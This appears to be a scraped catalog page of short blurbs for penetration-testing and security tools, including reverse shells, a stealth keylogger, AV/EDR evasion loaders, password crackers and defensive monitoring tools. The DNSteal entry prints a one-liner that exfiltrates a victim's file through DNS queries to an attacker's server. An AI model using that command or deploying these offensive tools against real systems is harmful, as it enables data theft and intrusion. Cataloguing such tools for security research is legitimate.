AutoLocalPrivilegeEscalation - An automated script that download potential exploit for linux kernel from exploitdb, and compile them automatically
An automated script that downloads potential exploits for the Linux kernel from exploitdb, and compiles them automatically. This script was created because of Hackademics: there are so many possible exploits for that version of the kernel that, as a rookie OSCP student, I am not able to find out the correct exploit, al...
PowerLurk - Malicious WMI Events using PowerShell
PowerLurk is a PowerShell toolset for building malicious WMI Event Subscriptions. The goal is to make WMI events easier to fire off during a penetration test or red team engagement. Please see my post Creeping on Users with WMI Events: Introducing PowerLurk for more detailed information:...
WifiChannelMonitor - Monitor APs and Wifi clients on selected channel (Monitor Mode) for Window
WifiChannelMonitor is a utility for Windows that captures wifi traffic on the channel you choose, using Microsoft Network Monitor capture driver in monitor mode, and displays extensive information about access points and the wifi clients connected to them. WifiChannelMonitor also allows you to vi...
Whitewidow - SQL Vulnerability Scanner
Whitewidow is an open source automated SQL vulnerability scanner, that is capable of running through a file list, or can scrape Google for potential vulnerable websites. It allows automatic file formatting, random user agents, IP addresses, server information, multiple SQL injection syntax, and a...
Whatportis - A Command To Search Port Names And numbers
It often happens that we need to find the default port number for a specific service, or what service is normally listening on a given port. Usage This tool allows you to find what port is associated with a service: $ whatportis redis...
SpiderFoot v2.6.1 - Open Source Intelligence Automation
SpiderFoot is an open source intelligence automation tool. Its goal is to automate the process of gathering intelligence about a given target. Purpose There are three main areas where SpiderFoot can be useful: 1. If you are a pen-tester, SpiderFoot will automate the reconnaissance stage of the tes...
Security Onion - Linux Distro For Intrusion Detection, Network Security Monitoring, And Log Management
Security Onion is a Linux distro for intrusion detection, network security monitoring, and log management. It's based on Ubuntu and contains Snort, Suricata, Bro, OSSEC, Sguil, Squert, ELSA, Xplico, NetworkMiner, and many other security tools. The easy-to-use Setup wizard allows you to build an...
Pupy - Multi-Platform Remote Administration Tool
Pupy is an opensource, multi-platform Remote Administration Tool written in Python. On Windows, Pupy uses reflective dll injection and leaves no traces on disk. Features : On windows, the Pupy payload is compiled as a reflective DLL and the whole python interpreter is loaded from memory. Pupy doe...
Windows Spy Keylogger - Software to Log Keystrokes in Stealth Mode for 32-bit/64-bit processes on Windows XP/Vista/7/8/10
Windows Spy Keylogger is free software to help you covertly monitor all activities on your computer. It intercepts everything that is typed on the keyboard and stores it in one log file, which you can view anytime later. You can track logins, passwords, emails, chats and all other secret thin...
DNSteal - DNS Exfiltration tool for stealthily sending files over DNS requests
This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests. Below is an image showing an example of how to use: On the victim machine, you simply can do something like so: for b in $xxd -p file/to/send.png; do dig @server $b.filename.com; done...
ZAP 2.4.2 - Penetration Testing Tool for Testing Web Applications
The Zed Attack Proxy ZAP is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testin...
ShellCheck - Automatically Detects Problems with sh/bash Scripts and Commands
ShellCheck is a static analysis and linting tool for sh/bash scripts. It's mainly focused on handling typical beginner and intermediate level syntax errors and pitfalls where the shell just gives a cryptic error message or strange behavior, but it also reports on a few more advanced issues where...
FastNetMon - Very Fast DDoS Analyzer with Sflow/Netflow/Mirror Support
A high performance DoS/DDoS load analyzer built on top of multiple packet capture engines NetFlow, IPFIX, sFLOW, netmap, PFRING, PCAP. What can we do? We can detect hosts in our own network with a large amount of packets per second/bytes per second or flow per second incoming or outgoing from...
Password Cracking Suite
How To Use It: git clone https://github.com/TecnoHack/Password-Cracking-Suite.git chmod +x csuit.py ./csuit.py Dics Path: In this path, you can add any dictionary you would like to use. Tools Path: In this path, the script will install 3rd party tools. You can download some here:...
Zarp - Local Network Attack Framework
Zarp is a network attack tool centered around the exploitation of local networks. This does not include system exploitation, but rather abusing networking protocols and stacks to take over, infiltrate, and knock out. Sessions can be managed to quickly poison and sniff multiple systems at once,...
Netsparker v3.5 - Web Application Security Scanner
Netsparker Web Application Security Scanner can find and report web application vulnerabilities such as SQL Injection and Cross-site Scripting XSS and security issues on all web applications and websites regardless of the platform and the technology they are built on. Netsparker is very easy to u...
BluetoothLogView - Creates a log of Bluetooth devices activity around you
BluetoothLogView is a small utility that monitors the activity of Bluetooth devices around you, and displays a log of Bluetooth devices on the main window. Every time that a new Bluetooth device arrives to your area and when the device leaves your area, a new log line is added with the following...
oclHashcat v1.20 - Worlds fastest password cracker
oclHashcat is a GPGPU-based multi-hash cracker using a brute-force attack implemented as mask attack, combinator attack, dictionary attack, hybrid attack, mask attack, and rule-based attack. This GPU cracker is a fusioned version of oclHashcat-plus and oclHashcat-lite. GPU Driver requirements: NV...
[Firefox Password Remover v1.5] Firefox Website Login Password Removal Tool
Firefox Password Remover is a free tool to quickly remove the stored website login passwords from Firefox. You can either remove selected ones or all of the stored passwords from the Firefox sign-on database. One of the unique features of this tool is that it allows you to remove the website...
[SSLSmart] Smart SSL Cipher Enumeration
SSLSmart is a highly flexible and interactive tool aimed at improving efficiency and reducing false positives during SSL testing. A number of tools allow users to test for supported SSL ciphers suites, but most only provide testers with a fixed set of cipher suites. Further testing is performed b...
[OMENS v1.17] The framework for distributing Actionable Intelligence
OMENS Object Monitor for Enhanced Network Security was born out of the intrusion and intrusion attempts analysis that I have been doing over many years. I consistently run into intrusion attempts that existing IDS systems have difficulty detecting. OMENS is my attempt to better detect and...
[oclHashcat-plus v0.15] Advanced Password Recovery
This version is the result of over 6 months of work, having modified 618,473 total lines of source code. Before we go into the details of the changes, here's a quick summary of the major changes: Added support for cracking passwords longer than 15 characters Added support for mask-files, which...
[Drozer] The Leading Security Testing Framework for Android.
drozer enables you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps’ IPC endpoints and the underlying OS. drozer provides tools to help you use and share public Android exploits. It helps you to deploy a droze...
[RIPS] A static source code analyser for vulnerabilities in PHP scripts
RIPS is a tool written in PHP to find vulnerabilities in PHP applications using static code analysis. By tokenizing and parsing all source code files RIPS is able to transform PHP source code into a program model and to detect sensitive sinks potentially vulnerable functions that can be tainted b...
[Gmail Password Dump] Command-line Tool to Recover Google Password
Gmail Password Dump is a command-line tool to instantly recover your lost Gmail password from various Google applications as well as popular web browsers and messengers. Currently it can recover your Gmail password from the following applications: Google Talk, Google Picasa, Google Desktop Search, Gma...
[MSF-Installer] Script to Automate Metasploit Framework Installation
Script to help with installing and configuring Metasploit Framework, Armitage and the Plugins I have written on OSX and Linux To use the script on OSX Java, Xcode and Command Development Tools from Xcode must be installed before running the script. In the case of OSX I also added the option of...
[BackBox Linux] Version 3.0
BackBox is a Linux distribution based on Ubuntu Desktop, and designed for performing penetration testing, incident response, computer forensics, and intelligence gathering. It uses the Xfce desktop environment, and is developed by Raffaele Forte and a small but dedicated team. This release includ...
Lazywarden - Automatic Bitwarden Backup
Secure, Automated, and Multi-Cloud Bitwarden Backup and Import System Lazywarden is a Python automation tool designed to Backup and Restore data from your vault, including Bitwarden attachments. It allows you to upload backups to multiple cloud storage services and receive notifications across...
Nemesis - An Offensive Data Enrichment Pipeline
Nemesis is an offensive data enrichment pipeline and operator support system. Built on Kubernetes with scale in mind, our goal with Nemesis was to create a centralized data processing platform that ingests data produced during offensive security assessments. Nemesis aims to automate a number of...
Route-Detect - Find Authentication (Authn) And Authorization (Authz) Security Bugs In Web Application Routes
Find authentication authn and authorization authz security bugs in web application routes: Web application HTTP route authn and authz bugs are some of the most common security issues found today. These industry standard resources highlight the severity of the issue: 2021 OWASP Top 10 1 - Broken...
JSpector - A Simple Burp Suite Extension To Crawl JavaScript (JS) Files In Passive Mode And Display The Results Directly On The Issues
JSpector is a Burp Suite extension that passively crawls JavaScript files and automatically creates issues with URLs, endpoints and dangerous methods found on the JS files. Prerequisites Before installing JSpector, you need to have Jython installed on Burp Suite. Installation 1. Download the late...
Caracal - Static Analyzer For Starknet Smart Contracts
Caracal is a static analyzer tool over the SIERRA representation for Starknet smart contracts. Features Detectors to detect vulnerable Cairo code Printers to report information Taint analysis Data flow analysis framework Easy to run in Scarb projects Installation Precompiled binaries Precompiled...
HTTP-Shell - MultiPlatform HTTP Reverse Shell
HTTP-Shell is Multiplatform Reverse Shell. This tool helps you to obtain a shell-like interface on a reverse connection over HTTP. Unlike other reverse shells, the main goal of the tool is to use it in conjunction with Microsoft Dev Tunnels, in order to get a connection as close as possible to a...
Acltoolkit - ACL Abuse Swiss-Knife
acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses. Installation pip install acltoolkit-ad or git clone https://github.com/zblurx/acltoolkit.git cd acltoolkit make Usage usage: acltoolkit -h -debug -hashes LMHASH:NTHASH -no-pass -k -dc-ip ip address -scheme ldap scheme...
Graphcat - Generate Graphs And Charts Based On Password Cracking Result
Simple script to generate graphs and charts on hashcat and john potfile and ntds Install git clone https://github.com/Orange-Cyberdefense/graphcat cd graphcat pip install . Helper $ graphcat.py -h usage: graphcat.py -h -potfile hashcat.potfile -hashfile hashfile.txt -john -format FORMAT...
Hades - Go Shellcode Loader That Combines Multiple Evasion Techniques
Hades is a proof of concept loader that combines several evasion techniques with the aim of bypassing the defensive mechanisms commonly used by modern AV/EDRs. Usage The easiest way is probably building the project on Linux using make. git clone https://github.com/f1zm0/hades && cd hades make The...
KubeStalk - Discovers Kubernetes And Related Infrastructure Based Attack Surface From A Black-Box Perspective
KubeStalk is a tool to discover Kubernetes and related infrastructure based attack surface from a black-box perspective. This tool is a community version of the tool used to probe for unsecured Kubernetes clusters around the internet during Project Resonance - Wave 9. Usage The GIF below...
GVision - A Reverse Image Search App That Use Google Cloud Vision API To Detect Landmarks And Web Entities From Images, Helping You Gather Valuable Information Quickly And Easily
GVision is a reverse image search app that uses Google Cloud Vision API to detect landmarks and web entities from images, helping you gather valuable information quickly and easily. About Google Cloud Vision API Google Cloud Vision API is a machine learning-powered image analysis service that...
CMLoot - Find Interesting Files Stored On (System Center) Configuration Manager (SCCM/CM) SMB Shares
CMLoot was created to easily find interesting files stored on System Center Configuration Manager SCCM/CM SMB shares. The shares are used for distributing software to Windows clients in Windows enterprise environments and can contain scripts/configuration files with passwords, certificates pfx,...
Slicer - Tool To Automate The Boring Process Of APK Recon
A tool to automate the recon process on an APK file. Slicer accepts a path to an extracted APK file and then returns all the activities, receivers, and services which are exported and have null permissions and can be externally provoked. Note : The APK has to be extracted via jadx or apktool...
Matano - The Open-Source Security Lake Platform For AWS
Matano is an open source security lake platform for AWS. It lets you ingest petabytes of security and log data from various sources, store and query them in an open Apache Iceberg data lake, and create Python detections as code for realtime alerting. Matano is fully serverless and designed...
NimGetSyscallStub - Get Fresh Syscalls From A Fresh Ntdll.Dll Copy
Get fresh Syscalls from a fresh ntdll.dll copy. This code can be used as an alternative to the already published awesome tools NimlineWhispers and NimlineWhispers2 by @ajpc500 or ParallelNimcalls. The advantage of grabbing Syscalls dynamically is, that the signature of the Stubs is not included i...
Ropr - A Blazing Fast Multithreaded ROP Gadget Finder. Ropper / Ropgadget Alternative
ropr is a blazing fast multithreaded ROP Gadget finder What is a ROP Gadget? ROP Return Oriented Programming Gadgets are small snippets of a few assembly instructions typically ending in a ret instruction which already exist as executable code within each binary or library. These gadgets may be...
Puwr - SSH Pivoting Script For Expanding Attack Surfaces On Local Networks
Easily expand your attack surface on a local network by discovering more hosts, via SSH. Using a machine running a SSH service, Puwr uses a given subnet range to scope out IP's, sending back any successful ping requests it has. This can be used to expand out an attack surface on a local network, ...
Hakoriginfinder - Tool For Discovering The Origin Host Behind A Reverse Proxy. Useful For Bypassing Cloud WAFs!
Tool for discovering the origin host behind a reverse proxy. Useful for bypassing WAFs and other reverse proxies. How does it work? This tool will first make a HTTP request to the hostname that you provide and store the response, then it will make a request to every IP address that you provide vi...
Pocsploit - A Lightweight, Flexible And Novel Open Source Poc Verification Framework
pocsploit is a lightweight, flexible and novel open source poc verification framework Pain points of the POC framework in the market 1. There are too many params, I don't know how to get started, but only some of them are commonly used. 2. YAML poc framework like nuclei & xray is not flexible...
DDexec - A Technique To Run Binaries Filelessly And Stealthily On Linux Using Dd To Replace The Shell With Another Process
In Linux, in order to run a program it must exist as a file; it must be accessible in some way through the file system hierarchy, as this is just how execve works. This file may reside on disk or in ram tmpfs, memfd but you need a filepath. This has made it very easy to control what is run on a Linux...
Request_Smuggler - Http Request Smuggling Vulnerability Scanner
Based on the amazing research by James Kettle. The tool can help to find servers that may be vulnerable to request smuggling vulnerability. Usage USAGE: requestsmuggler OPTIONS --url FLAGS: -h, --help Prints help information -V, --version Prints version information OPTIONS: --amount-of-payloads...
CodeAnalysis - Static Code Analysis
Tencent Cloud Code Analysis (TCA for short, code-named CodeDog inside the company early on) is a comprehensive platform for code analysis and issue tracking. TCA consists of three components: server, web and client. It also supports the integration of other code analysis tools. Code analysis is a...
DRAKVUF Sandbox - Automated Hypervisor-Level Malware Analysis System
DRAKVUF Sandbox is an automated black-box malware analysis system with DRAKVUF engine under the hood, which does not require an agent on guest OS. This project provides you with a friendly web interface that allows you to upload suspicious files to be analyzed. Once the sandboxing job is finished...